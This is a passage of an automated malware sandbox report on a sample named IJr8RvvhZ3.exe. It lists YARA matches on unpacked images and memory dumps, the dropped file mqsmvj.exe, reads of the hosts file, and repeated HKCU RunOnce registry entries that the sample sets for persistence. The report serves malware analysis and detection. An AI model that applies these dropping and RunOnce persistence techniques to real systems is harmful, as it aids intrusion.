                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: IJr8RvvhZ3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

                Data Obfuscation

                barindex
                Source: Yara matchFile source: IJr8RvvhZ3.exe, type: SAMPLE
                Source: Yara matchFile source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001C.00000000.542136140.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.302753635.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.543716929.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.246598852.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.598200905.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000000.583307214.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000000.518024199.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000000.415482571.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.373855926.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.437171123.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.344076256.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.560904578.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.634796069.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000000.433686067.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.693057490.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000000.473313238.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.607979017.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000000.495173424.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.681141144.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.284909876.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.502607674.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.374541763.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.472905613.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.650224978.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.366415830.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.502804269.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.638106882.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.345391884.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000000.455550683.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000000.384391365.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.406139264.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.678365276.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.326861802.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000000.674598119.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000000.631210947.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.559852565.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.593533053.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.436990656.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.720225413.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: IJr8RvvhZ3.exe PID: 732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4652, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5964, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5524, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 3824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 2228, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4864, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5160, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5636, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 2564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 6000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 3780, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F148400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,0_2_0F148400
                Source: IJr8RvvhZ3.exeStatic PE information: real checksum: 0x120f7 should be: 0x1dffd
                Source: mqsmvj.exe.0.drStatic PE information: real checksum: 0x120f7 should be: 0x1ad96
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwvJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcapJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuuJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhucJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpkJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaieltJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvjJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqrJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxkJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpkJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpkJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpkJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpkJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqrJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqrJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqrJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqrJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwvJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwvJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwvJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwvJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxkJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxkJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxkJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxkJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcapJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcapJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcapJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcapJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvjJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvjJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvjJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvjJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaieltJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaieltJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaieltJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaieltJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhucJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhucJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhucJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhucJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuuJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuuJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuuJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuuJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
